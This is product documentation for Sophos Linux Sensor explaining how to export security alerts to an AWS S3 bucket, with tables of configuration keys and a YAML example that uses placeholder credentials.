Exporting Alerts to S3
The blobstorage output type sends alerts to individual files in an AWS S3 bucket. Sophos Linux Sensor (SLS) can optionally create the target bucket or buckets so long as it has sufficient permissions.
Access to an AWS S3 bucket can either be granted explicitly by specifying an access key in the config or implicitly by granting role-based access to the service that is running SLS (for example the EC2 role).
This output type is commonly used for easy archiving of alerts in a durable store. It can also be used as the trigger for an ETL process in cloud environments where blob storage write events trigger a cloud function that processes the incoming alert. At this point alerts can be enriched, transformed, and shipped out to other systems as needed.
Configuration:
| Key | Required | Description |
|---|---|---|
type | yes | The output type. |
enabled | yes | Enables/disables the output. |
provider | yes | The cloud provider name. |
bucket_name | yes | The name of the bucket to write to. Subpaths within a bucket can be specified by delimiting the bucket name with a / |
create_bucket | no | Enables/disables bucket creation. |
AWS-specific configuration:
| Key | Required | Description |
|---|---|---|
aws_region | yes | The AWS region. |
aws_access_key_id | no | The AWS Access Key ID. |
aws_secret_access_key | no | The AWS Secret Access Key. |
aws_session_token | no | The AWS Session Token. |
aws_acl | no | An ACL string such as "bucket-owner-full-control" to add to the request. Requires s3:PutObjectAcl permissions. |
Example sending Alerts to AWS:
alert_output:
outputs:
# Write the Alert to AWS S3 authed through access keys
- type: blobstorage
enabled: true
create_bucket: true
bucket_name: sophos-alerts
provider: aws
aws_access_key_id: $ACCESS_KEY_ID
aws_secret_access_key: $SECRET_ACCESS_KEY
aws_region: us-east-2
aws_acl: "bucket-owner-full-control"